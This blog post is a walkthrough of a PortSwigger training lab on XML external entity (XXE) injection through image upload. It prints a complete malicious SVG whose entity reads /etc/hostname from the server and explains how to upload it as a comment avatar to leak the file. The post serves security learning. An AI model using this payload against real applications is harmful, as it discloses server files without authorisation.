Lab: Exploiting XXE via image file upload

Joel O.Joel O.
1 min read

Lab Scenario: Our mission is to exploit XXE through an image file upload on a web application. By uploading a crafted SVG image, we intend to reveal the contents of a server file, in this case, /etc/hostname. Let's proceed with the solution:

  1. Crafting the Malicious SVG Image:

    • Create a local SVG image with the following content:

        xmlCopy code<?xml version="1.0" standalone="yes"?>
  <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
  <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
    <text font-size="16" x="0" y="16">&xxe;</text>
  </svg>

  2. Posting a Comment with Image Upload:

    • Post a comment on a blog post.

    • Upload the crafted SVG image as an avatar.

  3. Exploiting XXE:

    • When you view your comment, the XXE payload in the SVG image will trigger, disclosing the contents of the /etc/hostname file.

  4. Submitting the Solution:

    • Use the "Submit solution" button to submit the value of the server hostname obtained from the XXE exploitation.

Conclusion: This lab exercise provides practical insights into exploiting XXE vulnerabilities through image file uploads. By following this step-by-step guide, users can deepen their understanding of XXE attacks and the potential risks associated with improper handling of XML input. Stay informed, keep learning, and continue exploring the dynamic field of cybersecurity to contribute to a more secure online environment.

Reference:

https://portswigger.net/web-security/xxe

https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload

10
Subscribe to my newsletter

Read articles from Joel O. directly inside your inbox. Subscribe to the newsletter, and don't miss out.

xxeportswiggerBurpsuite handson#cybersecuritywebsecurity

Written by

Joel O.
Joel O.

A passionate cybersecurity enthusiast and cloud aficionado. I am on a mission to unravel the complexities of the ever-evolving cyber landscape and guide you through the vast expanse of cloud technology. As a cybersecurity professional, I bring a wealth of experience in securing digital ecosystems and defending against cyber threats. My journey in the cloud realm has been both thrilling and enlightening, and I am here to share my insights, discoveries, and practical tips with you. In these virtual pages, expect a fusion of in-depth cybersecurity analyses and explorations into the limitless possibilities of cloud computing and cybersecurity. Whether you're a seasoned cybersecurity professional, a cloud enthusiast, or someone just stepping into the digital frontier, there's something here for you.